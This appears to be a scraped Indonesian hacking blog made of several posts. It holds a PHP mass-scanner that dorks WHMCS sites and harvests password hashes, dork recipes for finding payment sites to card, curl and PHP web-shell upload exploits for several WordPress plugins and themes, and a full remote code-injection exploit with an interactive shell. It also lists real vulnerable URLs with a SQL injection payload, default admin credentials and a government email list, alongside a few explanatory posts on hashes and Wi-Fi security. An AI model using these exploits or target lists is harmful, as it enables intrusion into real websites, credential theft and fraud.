<option>inurl:/hospedagem/ WHMCompleteSolution site:.</option>
<option>inurl:/klanten/ WHMCompleteSolution site:.</option>
<option>inurl:/loja/ WHMCompleteSolution site:.</option>
<option>inurl:/my/ WHMCompleteSolution site:.</option>
<option>inurl:/myaccount/ WHMCompleteSolution site:.</option>
<option>inurl:/myaccounts/ WHMCompleteSolution site:.</option>
<option>inurl:/order/ WHMCompleteSolution site:.</option>
<option>inurl:/panel/ WHMCompleteSolution site:.</option>
<option>inurl:/painel/ WHMCompleteSolution site:.</option>
<option>inurl:/painel/ WHMCompleteSolution site:.</option>
<option>inurl:/support/ WHMCompleteSolution site:.</option>
<option>inurl:/secure/ WHMCompleteSolution site:.</option>
<option>inurl:/whmcs/ WHMCompleteSolution site:.</option>
<option>inurl:/web/ WHMCompleteSolution site:.</option>
<option>inurl:/webhosting/ WHMCompleteSolution site:.</option>
<option>intitle:host WHMCompleteSolution site:.</option>
<option>intitle:solution WHMCompleteSolution site:.</option>
<option>intitle:server WHMCompleteSolution site:.</option>
<option>intitle:Winkelwagen WHMCompleteSolution site:.</option>
<option>intext:Winkelwagen WHMCompleteSolution site:.</option>
<option>intext:host WHMCompleteSolution site:.</option>
<option>intext:reseller WHMCompleteSolution site:.</option>
<option>intext:cheap WHMCompleteSolution site:.</option>
<option>intext:secure WHMCompleteSolution site:.</option>
<option>intext:design WHMCompleteSolution site:.</option>
</select><br /><br />
 </form>
<?php
        if(isset($_POST['dork']{0})) {
                $file = fopen("WMCS-Hashes.txt","a");
                echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';                       
                letItBy();                     
                for($googlePage = 1; $googlePage <= 50; $googlePage++) {
                        $googleResult = google_that($_POST['dork'], $googlePage);
                        if(!$googleResult) {
                                echo 'Finished scanning.';
                                fclose($file);
                                break;
                        }
                       
                        for($victim = 0; $victim < sizeof($googleResult); $victim++){
                                $result = check_vuln($googleResult[$victim]['unescapedUrl']);
                                $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
                                if($result != "Fail!") {
                                        $hashes = "";
                                        foreach ($result as $record) {
                                                $hashes = $hashes . str_replace(':::::','',$record) . "\n";
                                        }
                                        $sep = "========================================================\n";
                                        $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
                                        fwrite($file,$data);
                                        echo "<br /><font color=\"green\">Successfully Xploited...</font>";
                                        echo '<span class="Y">';
                                        echo "<pre>" . $data . "</pre></span><br />";
                                       
                                }
                                else {
                                echo '<span class="X">';
                                echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
                                echo "</span>\n<br />";
                                }
                                letItBy();
                        }
                }
                echo '</div>';
        }
?>
</center>
</td>
</table>
<br /><br />
<font face="Audiowide" color="blue" size="4">
Coded by: <font color="blue">Mr.chucky</font><br />
<br />Kunjungi Juga <a href="www.cireboncybercrime.org" target="_blank" style="text-decoration: none;">www.cireboncybercrime.org</a>
</font>

</center>
</body>
</html>
Diposting oleh Tidak ada komentar:

Cara Mengembangkan Dork

.::Dasar::.

Inurl: merupakan website yang kita tuju, yang dimaksud dengan inurl ini mungkin adalah ( ' ) ini merupakan sebuah trick untuk melihat apakah website vuln atau tidak.
Intext: kata - kata yang kita tujukan, ini dapat mencakup semua hal yang kita ketahui, misalkan.
Site: Alamat negara yang kita tuju, dalam hal mengembangkan dork yang paling seting di gunakan adalah negara UK yaitu, Site:"UK"
NB: Kalian bisa mengganti Uk menjadi domain semua negara sesuai hati dan kebutuhan.
.php?xx= : Akhir dari sebuah inurl atau alamat website yang kita tuju.

.::Langkah::.

1. Mengembangkan inurl
2. Mengembangkan intext
3. Mengembangkan Site
4. Mengembangkan .php?xxx=

.::Contoh::.

1.Contoh, inurl:"detail"  
Kalian bisa mengganti dengan kata kata yang lainnya seperti :1.payment2.detail3.author4.content
2. Contoh intext:"paypal" [kata yang sering di gunakan untuk melakukan carding pp]  
Kalian bisa mengganti dengan kata kata yang lainnya seperti :1.Master Card2.Visa3.payzaintext tidak selalu terpaku kepada sebuah kartu credit seperti pp/cc. Perlu di ingat untuk dork, kalian tidak harus menggunakan semuanya dalam pencarian di googleSeperti inurl:"content".php?id=" intext:"paypal" Site:"UK"     
[ Biasanya kalau kita tambahkan Site tetapi sudah ada intext tidak akan ada website yang tersedia ]
Jadi kalian bisa menghilangkan salah satu antara intext maupun site.
3. Contoh Site:"il" 
Kalian bisa mengganti dengan kata kata yang lainnya seperti :1.   UK2.   US3.   SG4.   MY5.   KR4. Contoh .php?id="  
Kalian bisa mengganti dengan kata kata yang lainnya seperti :1.   .php?cat="2.   .php?carID="3.   .php?category="4.   .php?id="SEBAGIAN CONTOH DORK YANG DIKEMBANGKAN :inurl:"content" .php?category=" intext:"Visa"inurl:".php?carID="" intext:"shopping"
Diposting oleh Tidak ada komentar:

Exploit WordPress Fluid_forms Upload Vulnerability

Dork : inurl:fluid_forms
exploit : /wp-content/plugins/fluid_forms/file-upload/server/php/

CSRF : gwe tulis di komen :D



shell akses :
/wp-content//plugins//fluid_forms/file-upload/server/php/files/shellname.php

*.:: caranya kayak Formcraft ::.

Sumber : Slemanroot.net
Diposting oleh Tidak ada komentar:

ThisWay file upload

*pakai XAMPP

Dork : inurl:"/wp-content/themes/ThisWay/"
Exploit : /wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php

Script PHP :

$uploadfile="jiwa.php";
$ch = curl_init("SlemanGetar.com/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Sumber: Slemanroot.net

**mau vakum bentaran
Diposting oleh Tidak ada komentar:

WP Pitch Print

Dork: inurl:"inurl:/wp-content/plugins/pitchprint/"
Exploit : Vulnerability:/wp-content/plugins/pitchprint/uploader/

CSRF :

enctype="multipart/form-data">
Upload


shell: /wp-content/plugins/pitchprint/uploader/file/*nama shell*
heppy learning

warning segala bentuk penyalahgunaan bukan salah ts. hanya sekedar pembelajaran

Thanks sumber slemanroot.net
Diposting oleh Tidak ada komentar:

WP Atom Thames Arbitary File Upload

Langsung   XAMPP siapin

  • Dork : inurl:"/wp-content/themes/atom/"
  • Exploit: /wp-content/themes/atom/uploadify/uploadify.php
script php:

$uploadfile="nama_shell_mu.php";

$ch = curl_init("www.target.com/wp-content/themes/atom/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

**bisa kan pakenya :*
Diposting oleh Tidak ada komentar:

Exploit Wp Easy Gallery Pro Vulnerability

Dork: inurl:"wp-easy-gallery-pro"
Vulnerable & Exploits: /wp-content/plugins/wp-easy-gallery/admin/php.php
csrf:

form enctype="multipart/form-data"
shell akses: /wp-content/uploads/jiwa.php

cara penggunaan seperti Formcraft

Note:
segala bentuk penyalahgunaan bukan tanggung jawab saya. hanya untuk pengetahuan. (Dosa Tanggung Ndiri :p )

Thanks ^_^

bonus nya
http://www.4shared.com/photo/Gy1Df_eFba/CBzMLh2UoAA3XSqjpg_large.html :v :v :p
Diposting oleh Tidak ada komentar:

Vuln 

http://www.magicwings.com/index.php?id=169
http://patshortt.com/news.php?id=37
http://www.marsfigures.com/main.php?id=9
http://www.covpub.co.uk/showprod.php?id=487
http://eshop.whtt.org/eshop.php?id=22
http://www.e-wigs.com/wigs.php?id=1773
http://www.quakeinc.com/Store-View.php?id=317
http://www.uninuts.co.za/index.php?id=2
http://www.gurusoundz.com/productdetails.php?id=42
http://www.mcfarlandbooks.com/book-2.php?id=978-0-7864-4451-9
http://www.durasight.com/Store-View.php?id=634
http://www.hotscriptsmart.com/visit.php?id=4261
http://www.bergarausa.com/Store-View.php?id=694
http://www.laserdirect.co.nz/items/index.php?id=96
http://www.sciences.ch/htmlfr/php/cliccount/click.php?id=85
http://www.safrai.com/details.php?id=450
http://www.sportschirps.com/detail.php?id=137
http://www.mmt.com/green/store_products.view.php?id=50
http://www.mydotca.ca/go.php?id=396
http://www.sfrevu.com/php/counthits.php?ID=940
http://smapp.rand.org/rwtid/incident_detail.php?id=17952
http://www.donaldsoneducation.com/news_full.php?id=-1+union+select+0,1,2,3,4,5,6--
http://www.dustri.com/index.php?id=8&magId=22&volId=128&issueId=9314&no_cache=1
http://www.mystickoi.com/buyKoi.php?id=200002
http://www.littlegiant.com.hk/en_product1_details.php?id=3154&fid=1&sid=19
http://www.autorage.com.sg/productdetails.php?id=429
http://www.sgbest.com/product.php?id=582
http://www.actionkover.com/store/mcart.php?ID=2
http://www.lures.info/hse20/search.php?id=3&query=TABLE+BORDER&offset=290&results_per_page=12
http://www.ibuyjamaica.com/help_details.php?id=31
http://www.mytec.com.my/product_cart.php?id=91
Diposting oleh Tidak ada komentar:

Celah cms lokomedia [new ver]

Dork: content.php?module=user

lalu masukkkan exploit:
/adminweb ,
/admin ,
/administrator
*cari admin pagenya

deafult user and pass

admin:admin
wiro:sableng
wiros:sabdi
joko:sembung
sinto:gendeng

semoga dapet site yang belum di ganti deafult user sama pass adminnya

by : Anonim Dot ID

Note:
hanya untuk pembelajaran, penyalahgunaan diluar tanggung jawab ts (dosa tanggung sendiri)
Diposting oleh Tidak ada komentar:

daftar email president.gov.il 

president@president.gov.il
public@president.gov.il
mickey@president.gov.il
yairz@president.gov.il
spokesperson@president.gov.il
Anat@president.gov.il
sharon@president.gov.il
ido@president.gov.il
jamal@president.gov.il
adar@president.gov.il
akiva@president.gov.il
ayeletf@president.gov.il
chayim@president.gov.il
danielc@president.gov.il
info@president.gov.il
kabat@president.gov.il
please.public@president.gov.il
Diposting oleh Tidak ada komentar:

How To Remote Exploit Wordpress Ninetofive

pake CGI shell download disini http://adf.ly/1DRAlE pass:webr00t

  • Dork: inurl:/wp-content/themes/ninetofive
  • Exploits: /wp-content/themes/ninetofive/scripts/doajaxfileupload.php
  • Vulnerability: {"error":"No files were uploaded."}
  • Command: curl -v -F "qqfile=@jiwa.php" "http://localhost/wp-content/themes/ninetofive/scripts/doajaxfileupload.php"
Note: 
Upload dulu shell yg mau kita Remote dari CGI shell ke Web Target
Masukan Command sesuai nama Shell dan site Target kalian jgn sampe Keliru sayank =))

Set-Cookie: PixelAttached_1=%2Fhome%2Fsciencef%2Fpublic_html%2Flocalhost%2Fwp-content%2Fuploads%2F2015%2F03%2Fjiwa_551a89b87c7d7.php; expires=Tue, 31-Mar-2015 12:49:12 

jiwa_551a89b87c7d7.php adalah Result Shell kita ( oia name shellnya bisa berubah gak nentu soalnya)

Result: /wp-content/uploads/2015/04/jiwa.php ( Lebih jelasnya liat di command Resultnya om )

nb:hanya untuk pembelajaran, penyalah gunaan di luar tanggung jawab admin (dosa tanggung ndiri)

matursuwun: slemanroot.net lebih spesipik ke bang Sinkaroid
Diposting oleh Tidak ada komentar:

Jenis Jenis Hash & Enkripsi

1.MD4 (Message-Digest algortihm 4)
– MD4 dibuat oleh Ronald Rivest pada Oktober 1990, MD4 adalah hash function yang dipakai sebelum MD5, namun karena banyaknya kelemahan MD4 membuatnya diganti oleh MD5.
– panjang 16 bytes (32 karakter)
– contoh : 31d6cfe0d16ae931b73c59d7e0c089c0

2. MD5 (Message-Digest algortihm 5)
– MD5 di desain oleh Ronald Rivest pada tahun 1991 untuk menggantikan hash function sebelumnya, MD4. Pada tahun 1996 (http://id.wikipedia.org/wiki/MD5)
– digunakan di phpBB v2.x, Joomla versi dibawah 1.0.13 dan digunakan oleh beberapa CMS dan forum
– panjangnya 16 bytes (32 karakter)
– contoh : c4ca4238a0b923820dcc509a6f75849b

3. MD5($pass.$salt)
– Digunakan di WB News, Joomla versi 1.0.13 dan versi diatasnya
– panjang 16 bytes (32 karakter)
– hash yang satu ini dimulai dari hashnya duluan kemudian dilanjutkan oleh saltnya
– contoh : 6f04f0d75f6870858bae14ac0b6d9f73

4. MD5($salt.$pass)
– Digunakan di osCommerce, AEF, Gallery dan beberapa CMS lainnya
– panjang 16 bytes (32 karakter)
– hash yang satu ini dimulai dari saltnya duluan kemudian dilanjutkan oleh hashnya
– contoh : f190ce9ac8445d249747cab7be43f7d

5. md5(md5($pass).$salt)
– Digunakan di vBulletin, IceBB dan cms lainnya
– panjang 16 bytes (32 karakter)
– contoh : 6011527690eddca23580955c216b1fd2

6. MD5(WordPress)
– Digunakan di wordpress
– panjangnya 17 bytes (34 karakter)
– hashnya dimulai oleh tanda $P$ kemudian dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah huruf “B”) kemudian dilanjutkan oleh saltnya (8 karakter yg disusun secara acak, dalam contoh ini saltnya adalah “12345678″) lalu dilanjutkan oleh hashnya
– contoh : $P$B123456780BhGFYSlUqGyE6ErKErL01

7. MD5(phpBB3)
– Digunakan di CMS phpBB 3.x.x
– panjangnya 17 bytes (34 karakter)
– hashnya oleh tanda $H$ lalu dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah nomor “9″), kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah “12345678″) kemudian dilanjutkan oleh hashnya
– contoh : $H$9123456785DAERgALpsri.D9z3ht120

8. SHA-1(Secure Hash Algorithm)
– Diciptakan oleh National Institue of Standars and Technology atau U.S. Federal Information Processing Standard digunakan oleh beberapa CMS dan beberapa forum
– panjangnya 20 bytes (40 karakter)
– contoh : 356a192b7913b04c54574d18c28d46e6395428ab

9. SHA-256(Secure Hash Algorithm)
– hashnya dimulai oleh tanda $5$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah “12345678″) lalu dilanjutkan oleh karakter “$” kemudian dilanjutkan oleh hashnya
– panjang 55 karakter
– contoh : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi…

10. SHA-512(Secure Hash Algorithm)
– hashnya dimulai oleh tanda $6$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah “12345678″) lalu dilanjutkan oleh karakter “$” kemudian dilanjutkan oleh hashnya
– panjang 98 karakter
– contoh : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm…

11. Base64
– algoritma yg berfungsi untuk encoding dan decoding suatu data ke dalam format ASCII. panjang maksimal 64 karakter hashnya terdiri dari A..Z, a..z dan 0..9, serta ditambah dengan dua karakter terakhir yang bersimbol yaitu + dan / serta satu buah karakter sama dengan “=”
– digunakan di beberapa forum dan CMS
– contoh : Y3liZXJfY3JpbWluYWw=

Situs untuk mengcrack hash:
http://www.md5decrypter.co.uk/ => decrypt MD5
http://www.md5decrypter.co.uk/sha1-decrypt.aspx => decrypt SHA1
http://base64-encoder-online.waraxe.us/ => decode/encode base64
dan masih banyak lagi
Diposting oleh Tidak ada komentar:

Patch Bug SQLi

$content=mysql_fetch_object(mysql_query("SELECT * FROM ".SB_TBL_DYNAMIC." WHERE content_id ='".$_GET['content_id']."'")); ?>
                        
gak ada filter
 Code:
 
error_reporting(0);
function filtering($content_id){
$idf = mysql_real_escape_string($content_id);
if (!ctype_digit($idf) || $idf < 0){ exit; } else { return $content_id; } } $id = $_GET['content_id'];

jadi seperti ini

error_reporting(0);
function filtering($content_id){
$idf = mysql_real_escape_string($content_id);
if (!ctype_digit($idf) || $idf < 0){ exit; } else { return $content_id; } } $id = $_GET['content_id']; $content=mysql_fetch_object(mysql_query("SELECT * FROM ".SB_TBL_DYNAMIC." WHERE content_id ='".$_GET['content_id']."'")); ?>
 
Note:
kalo salah tolong koreksi :D
Diposting oleh Tidak ada komentar:

WPA2, WEP, WAP, TKIP

WEP
WEP merupakan standart keamanan & enkripsi pertama yang digunakan pada wireless, WEP (Wired Equivalent Privacy) adalah suatu metoda pengamanan jaringan nirkabel, disebut juga dengan Shared Key Authentication. Shared Key Authentication adalah metoda otentikasi yang membutuhkan penggunaan WEP.

Enkripsi WEP menggunakan kunci yang dimasukkan (oleh administrator) ke client maupun access point. Kunci ini harus cocok dari yang diberikan akses point ke client, dengan yang dimasukkan client untuk authentikasi menuju access point, dan WEP mempunyai standar 802.11b.
Proses Shared Key Authentication:
Client meminta asosiasi ke access point, langkah ini sama seperti Open System Authentication.
Access point mengirimkan text challenge ke client secara transparan.
Client akan memberikan respon dengan mengenkripsi text challenge dengan menggunakan kunci WEP dan mengirimkan kembali ke access point.
Access point memberi respon atas tanggapan client, akses point akan melakukan decrypt terhadap respon enkripsi dari client untuk melakukan verifikasi bahwa text challenge dienkripsi dengan menggunakan WEP key yang sesuai. Pada proses ini, access point akan menentukan apakah client sudah memberikan kunci WEP yang sesuai. Apabila kunci WEP yang diberikan oleh client sudah benar, maka access point akan merespon positif dan langsung meng-authentikasi client. Namun bila kunci WEP yang dimasukkan client adalah salah, maka access point akan merespon negatif dan client tidak akan diberi authentikasi. Dengan demikian, client tidak akan terauthentikasi dan tidak terasosiasi.
WEP memiliki berbagai kelemahan antara lain :
Masalah kunci yang lemah, algoritma RC4 yang digunakan dapat dipecahkan.
WEP menggunakan kunci yang bersifat statis
Masalah initialization vector (IV) WEP
Masalah integritas pesan Cyclic Redundancy Check (CRC-32)
WEP terdiri dari dua tingkatan, yakni kunci 64 bit, dan 128 bit. Sebenarnya kunci rahasia pada kunci WEP 64 bit hanya 40 bit, sedang 24bit merupakan Inisialisasi Vektor (IV). Demikian juga pada kunci WEP 128 bit, kunci rahasia terdiri dari 104bit.
Serangan-serangan pada kelemahan WEP antara lain :
Serangan terhadap kelemahan inisialisasi vektor (IV), sering disebut FMS attack. FMS singkatan dari nama ketiga penemu kelemahan IV yakni Fluhrer, Mantin, dan Shamir. Serangan ini dilakukan dengan cara mengumpulkan IV yang lemah sebanyak-banyaknya. Semakin banyak IV lemah yang diperoleh, semakin cepat ditemukan kunci yang digunakan
Mendapatkan IV yang unik melalui packet data yang diperoleh untuk diolah untuk proses cracking kunci WEP dengan lebih cepat. Cara ini disebut chopping attack, pertama kali ditemukan oleh h1kari. Teknik ini hanya membutuhkan IV yang unik sehingga mengurangi kebutuhan IV yang lemah dalam melakukan cracking WEP.
Kedua serangan diatas membutuhkan waktu dan packet yang cukup, untuk mempersingkat waktu, para hacker biasanya melakukan traffic injection. Traffic Injection yang sering dilakukan adalah dengan cara mengumpulkan packet ARP kemudian mengirimkan kembali ke access point. Hal ini mengakibatkan pengumpulan initial vektor lebih mudah dan cepat. Berbeda dengan serangan pertama dan kedua, untuk serangan traffic injection,diperlukan spesifikasi alat dan aplikasi tertentu yang mulai jarang ditemui di toko-toko, mulai dari chipset, versi firmware, dan versi driver serta tidak jarang harus melakukan patching terhadap driver dan aplikasinya. sumber

WAP
Wireless Apliccation Protokol disingkat WAP adalah standar internasional terbuka untuk aplikasi yang menggunakan komunikasi nirkabel. Tujuan utamanya untuk membangun aplikasi yang dapat mengakses internet dari telepon genggam atau PDA.

Disingkat dengan WAP.
Standar protokol untuk aplikasi wireless (seperti yang digunakan pada ponsel). WAP adalah sebuah protocol atau sebuah teknik messaging service yang memungkinkan sebuah hp digital atau terminal mobile yang mempunyai fasilitas WAP, melihat/membaca isi sebuah situs di internet dalam sebuah format text khusus. Situs internet ini harus merupakan situs dengan fasilitas WAP.

Teknologi ini merupakan hasil kerjasama antar industri untuk membuat sebuah standar yang terbuka (open standard) dan berbasis pada standar Internet, serta beberapa protokol yang sudah dioptimasi untuk lingkungan wireless.

Teknologi ini bekerja dalam modus teks dengan kecepatan sekitar 9,6 kbps. Belakangan juga dikembangkan protokol GPRS yang memiliki beberapa kelebihan dibandingkan WAP.

Wireless Application Protocol merupakan sebuah protocol pengembangan dari protocol wireless data yang telah ada. Phone.com menciptakan sebuah versi standart HTML (HyperText Markup Language) Internet protocol yang didisain khusus untuk transfer informasi antar mobile network yang efisien. Terminal wireless dengan HDML (Handheld Device Markup Language) microbrowser, dan Handheld Device Transport Protocol (HDTP) dari Phone.com terhubung dengan UP.Link Server Suite yang seterusnya terhubung ke Internet atau intranet dimana informasi yang dibutuhkan berada. Teknologi inilah yang kemudian dikenal sebagai WAP. sumber

WPA2
WPA2 adalah sertifikasi produk yang tersedia melalui Wi-Fi Alliance. WPA2 Sertifikasi hanya menyatakan bahwa peralatan nirkabel yang kompatibel dengan standar IEEE 802.11i. WPA2 sertifikasi produk yang secara resmi menggantikan wired equivalent privacy (WEP) dan fitur keamanan lain yang asli standar IEEE 802.11. WPA2 tujuan dari sertifikasi adalah untuk mendukung wajib tambahan fitur keamanan standar IEEE 802.11i yang tidak sudah termasuk untuk produk-produk yang mendukung WPA. sumber

TKIP
Dalam dunia komputer, TKIP atau Temporal Key Integrity Protocol adalah sebuah protokol yang didefinisikan oleh IEEE 802.11i yang mengkhususkan untuk jaringan nirkabel untuk menggantikan WEP. TKIP didesain untuk menggantikan WEP tanpa mengubah / mengganti perangkat keras. Hal ini diperlukan karena “buruknya†jenis pengamanan WEP meninggalkan jaringan nirkabel tanpa aktif mengamankan link-layer. Solusi untuk masalah ini tidak akan menunggu untuk menggantikan manfaat dari perangkat keras. Untuk alasan tersebut, TKIP (Baca: tee-kip), seperti WEP, menggunakan skema kunci berdasarkan RC4, tetapi tidak seperti WEP, TKIP meng-enkripsi semua paket data yang dikirimkan dengan kunci enkripsi yang unik nya itu sendiri.

TKIP menghasilkan 'per-packet key mixing', sebuah pesan yang ter-integrity yang memeriksa dan sebuah mekanisme 're-keying' sehingga pengalamatan menjadi isu pengamanan dengan WEP. Hal ini menambah kerumitan dari pen-dekodean kunci dengan menurunkan ketersediaan jumlah data kepada cracker, itu telah dienkripsi menggunakan suatu kunci khusus. sumbera
Diposting oleh Tidak ada komentar:

Remote Wp Exploit n-media

Dork Google: index of website-contact-form-with-file-upload
                          index of /uploads/contact_files/
Bisa juga gunakan Plugin untuk mencari Dorknya om,
Ex: /plugins/website-contact-form-with-file-upload/ site:.com

Disini saya menggunakan CGI shell untuk Exploitasinya, Sebenarnya ini Exploit Cuma di OS Linux doank , tapi ini Bisa di remote kok santai aja =))
Cara penggunaanya sama Kayak Exploit Ninetofive Bisa dilihat disini mas bro
[ https://www.facebook.com/notes/dark-defence-cyber-team/how-to-remote-exploit-wordpress-ninetofive/1578809292394711 ]

Vulnerable: The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.

# PoC:

 curl -k -X POST -F "action=upload" -F "Filedata=@jiwa.php" -F "action=nm_webcontact_upload_file" http://VICTIM/wp-admin/admin-ajax.php
 
 
Result: {"status":"uploaded","filename":"1427927588-jiwa.php"}

# Backdoor Location:

http://VICTIM/wp-content/uploads/contact_files/1427927588-jiwa.php

Note:
Saya tidak bertanggung jawab tentang penyalah gunaan tutorial diatas sekedar untuk pembelajaran

thanks to: Slemanroot.net
Diposting oleh Tidak ada komentar:

Fennel InfoTech CMS All Version Sql-Injection

Google Dork: "Designed by: Fennel Infotech"  , intext:"Designed by: Fennel Infotech" inurl:"id="

Sql Injection In Fenell Info Tech CMSes Created Beacuse CMSes Are Custom We Dont Have A Defualt PHP File Like term.php?id=

so we must use Dork to find web vuln



Poc Of VulnerAbility:

 http://klgshare.in/service-detail.php?id=9%27

 http://www.jewellerytaglabel.com/tags_details.php?id=63%27

 http://www.touchofhopefoundation.org/sub.php?id=36%27

[Default Admin Page]

You Should Add '/admin/' at the end of the URL

Inject manullay or use havij!

Nb: use this for positive things TS is not responsible for you use in a negative things, so just for learning,

Thanks You, Happy learning

By Tener_Attacker
Diposting oleh Tidak ada komentar:

Softbit Solutions SQL Injection

!=========================================!
[+] Google Dork : "Powered By : Softbit Solutions" + inurl:id=
[+] Vulnerable_parameter : "ID" .
!=========================================!
Demo :
vishvavedanta.com/news_events.php?id=2
http://dronacharyapublicschool.com/weekly_details.php?ID=5
===========================================
Thanks to: ID
Diposting oleh Tidak ada komentar:

Open-Letters - Remote PHP Code Injection Vulnerability By Tunisian Cyber

/*
OutPut:
#[+] Author: TUNISIAN CYBER
#[+] Script coded BY: Egidio Romano aka EgiX
#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability
#[+] Date: 19-04-2015
#[+] Vendor: http://www.open-letters.de/
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] CVE:
#[+] Twitter: @TCYB3R
#[+] Egix's Contact: n0b0d13s[at]gmail[dot]com
#[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png
OL-shell>

*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die( "\n[-] No response from {$host}:80\n");

    fwrite($sock, $packet);
    return stream_get_contents($sock);
}

print "#[+] Author: TUNISIAN CYBER\n";
print "#[+] Script coded BY: Egidio Romano aka EgiX\n";
print "#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability\n";
print "#[+] Date: 19-04-2015\n";
print "#[+] Vendor: http://www.open-letters.de/\n";
print "#[+] Type: WebAPP\n";
print "#[+] Tested on: KaliLinux (Debian)\n";
print "#[+] CVE:\n";
print "#[+] Twitter: @TCYB3R\n";
print "#[+] Egix's Contact: n0b0d13s[at]gmail[dot]com\n";
print "#[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] ";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /zenphoto/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];

$exploit = "foo=";
$packet  = "POST {$path}external_scripts/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($exploit)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$exploit}";

http_send($host, $packet);

$packet  = "GET {$path}external_scripts/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while(1)
{
    print "\nOL-shell> ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
    print $m[1] : die("\n[-] Exploit failed!\n");
}

?>
Diposting oleh Tidak ada komentar:

WordPress TheCartPress Plugin 1.3.9 - Multiple Vulnerabilities

Advisory ID: HTB23254
Product: TheCartPress WordPress plugin
Vendor: TheCartPress team
Vulnerable Version(s): 1.3.9 and probably prior
Tested Version: 1.3.9
Advisory Publication:  April 8, 2015  [without technical details]
Vendor Notification: April 8, 2015
Public Disclosure: April 29, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79], Improper Access Control [CWE-284]
CVE References: CVE-2015-3301, CVE-2015-3300, CVE-2015-3302
Risk Level: High
CVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in TheCartPress WordPress plugin, which can be exploited to execute arbitrary PHP code, disclose sensitive data, and perform Cross-Site Scripting attacks against users of WordPress installations with the vulnerable plugin.

1) Local PHP File Inclusion in TheCartPress WordPress plugin: CVE-2015-3301

Input passed via the "tcp_box_path" HTTP POST parameter passed to "/wp-admin/admin.php?page=checkout_editor_settings" URL is not properly verified before being used in PHP 'include()' function, and can be abused to include arbitrary local files via directory traversal sequences.

In order to successfully exploit the vulnerability an attacker needs to have administrator privileges on WordPress installation, however this can be also exploited via CSRF vector to which the script is vulnerable as well.

Simple CSRF exploit below will execute the content of '/etc/passwd' file when a logged-in administrator will visit a page with it:

 document.main.submit();



2) Stored XSS in TheCartPress WordPress plugin: CVE-2015-3300

During the checkout process, many user-supplied HTTP POST parameters (see complete list in PoC)in "Shipping address" and "Billing address" sections are not being sanitized before being stored in the local database.

Simple mass-XSS PoC against "Billing address" section (PoC against "Shipping address" scetion is identical, just replace 'billing_' prefix with 'shipping_') will write several JS pop-up alerts into the application database:



A non-authenticated attacker may inject malicious HTML and JS code that will be stored in the application database, and available to any non-authenticated user on the following URL:

http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order

As well as on the following URL accessible to WordPress administrator only:

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/OrdersListTable.php


3) Improper Access Control in TheCartPress WordPress plugin: CVE-2015-3302

Any non-authenticated user may browse orders of other users due to broken authentication mechanism. To reproduce the vulnerability an attacker shall first open the following URL:
http://wordpress/shopping-cart/checkout/?tcp_checkout=ok&order_id=[order_id]

And just after open the following URL to see full order details:
http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order

Moreover, the order ID can be easily predicted, as every new order ID is an incremented value of the previous one. This enables non-authenticated remote attacker to steal all currently-existing orders.


4) Multiple XSS in TheCartPress WordPress plugin (against administrator only): CVE-2015-3300

